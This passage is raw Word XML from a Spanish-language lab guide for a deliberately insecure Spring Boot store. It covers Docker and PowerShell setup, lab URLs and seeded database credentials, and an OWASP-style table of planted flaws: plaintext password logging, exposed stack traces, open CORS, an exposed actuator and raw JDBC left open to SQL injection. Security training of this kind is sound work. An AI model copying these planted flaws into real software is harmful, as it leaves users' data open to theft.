              <w:t xml:space="preserve">Security Logging and Alerting Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5150"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">LegacyLogger registra usuario y password en texto plano; sin alertas ni SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1150"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">A10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3050"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Mishandling of Exceptional Conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5150"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">GlobalExceptionHandler devuelve stacktrace completo en toda excepción no controlada</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B2A4A" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Requisitos previos (entorno Windows)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La siguiente guía asume un equipo con Windows 10/11 y PowerShell 5.1 o superior (se recomienda PowerShell 7+, que además permite usar el parámetro -Form de Invoke-RestMethod para las pruebas de subida de archivos).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker Desktop para Windows (con el backend de WSL2 habilitado), versión reciente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Git para Windows (opcional, para clonar/gestionar el repositorio).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Java 17 (JDK) y Maven 3.8+, solo si se desea ejecutar el backend fuera de Docker (con mvn spring-boot:run).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Python 3 (opcional), para levantar el frontend con un servidor HTTP simple si no se usa Docker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap instalado (vía pip: pip install sqlmap, o el binario oficial) para la sección de SQL Injection automatizado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Navegador moderno (Chrome o Firefox) con las DevTools para inspeccionar peticiones.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6"/>
              <w:left w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:bottom w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:right w:val="single" w:color="1B2A4A" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="F5F0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B2A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Nota importante: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Todos los comandos de este informe están escritos para PowerShell (no para Bash/WSL). Las diferencias clave frente a una guía en Bash son: uso de Invoke-RestMethod en lugar de curl para peticiones JSON, ConvertTo-Json/ConvertFrom-Json en lugar de comillas y jq, $env:VARIABLE en lugar de export VARIABLE=, y bucles con ForEach-Object en lugar de for en una línea.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B2A4A" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Guía de despliegue en Docker (PowerShell)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Existen dos formas de levantar el laboratorio: (A) solo la base de datos en Docker y el backend con Maven en el host, ideal para desarrollo/depuración; o (B) el stack completo en Docker Compose (frontend + backend + base de datos), que reproduce mejor un escenario real. A continuación se detallan ambas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 0 — Verificar Docker Desktop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docker --version</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">docker compose version</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"># Docker Desktop debe estar iniciado (icono de la ballena en la bandeja del sistema)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Opción A — Solo base de datos en Docker + backend con Maven</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 1 — Clonar / ubicar el proyecto y levantar PostgreSQL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cd C:\lab\tienda-insegura</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">docker compose up -d postgres</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Verificar que el contenedor esté saludable</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">docker compose ps</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">docker compose logs postgres</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 2 — Levantar el backend (Spring Boot)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r>
              <w:t>cd backend</w:t>
              <w:br/>
              <w:t>mvn spring-boot:run</w:t>
              <w:br/>
              <w:br/>
              <w:t># Requiere Maven 3.8+ instalado en el sistema.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La API quedará disponible en http://127.0.0.1:8080. Al iniciar, la consola imprime las credenciales del usuario administrador semilla (esto es en sí mismo una vulnerabilidad A09, ver capítulo 8).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 3 — Levantar el frontend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Opción rápida con Python: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r>
              <w:t>cd ..\frontend</w:t>
              <w:br/>
              <w:t>python -m http.server 5500</w:t>
              <w:br/>
              <w:t># Abrir en el navegador: http://127.0.0.1:5500</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Opción con la extensión Live Server de VS Code: abrir la carpeta frontend/, clic derecho sobre index.html → "Open with Live Server" (por defecto en http://127.0.0.1:5500). El frontend llama directamente a http://127.0.0.1:8080/api porque CORS está abierto a propósito en la v1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Opción B — Stack completo con Docker Compose (recomendada)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta opción levanta los tres contenedores (postgres, backend, frontend) usando el perfil "full" definido en docker-compose.yml, y es la que mejor simula un despliegue real.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cd C:\lab\tienda-insegura</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">docker compose --profile full up -d --build</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Ver el estado de los tres servicios</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">docker compose ps</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Seguir los logs del backend (por ejemplo, para ver las credenciales semilla o los payloads de RCE)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">docker compose logs -f backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Al finalizar, el laboratorio queda disponible en: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Frontend (tienda): http://127.0.0.1:3000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>API backend: http://127.0.0.1:8080/api</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Actuator (expuesto a propósito): http://127.0.0.1:8080/actuator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PostgreSQL: 127.0.0.1:5432 (usuario tienda_user / password tienda_pass_123)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detener y limpiar el entorno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docker compose --profile full down</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Para eliminar también el volumen de datos de PostgreSQL (reinicia la BD desde cero)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">docker compose --profile full down -v</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Verificación rápida del despliegue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Invoke-RestMethod -Uri "http://127.0.0.1:8080/api/productos" | ConvertTo-Json -Depth 5</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Invoke-RestMethod -Uri "http://127.0.0.1:3000" -Method Head</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6"/>
              <w:left w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:bottom w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:right w:val="single" w:color="1B2A4A" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="F5F0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Nota: Nginx se comunica con el backend mediante el nombre de servicio Docker backend:8080. No se usa host.docker.internal, por lo que el mismo compose funciona en Windows, Linux y macOS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B2A4A" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Explicación del backend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El backend es una API REST construida con Spring Boot 3.2.5 sobre Java 17. Sigue una organización en capas clásica: controladores (controller), servicios (service), repositorios (repository) y modelos (model), más una capa de configuración (config) y manejo de errores (exception).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Estructura de paquetes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com.tienda.insegura</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">├── controller/   → Expone los endpoints REST (@RestController)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">├── service/      → Lógica de negocio (AuthService, ProductService, CartService, OrderService, ReportService)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">├── repository/   → Acceso a datos. UserRepository/CategoryRepository/OrderRepository usan JPA;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">│                   ProductRepositoryJdbc usa JDBC puro (a propósito, para el SQLi)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
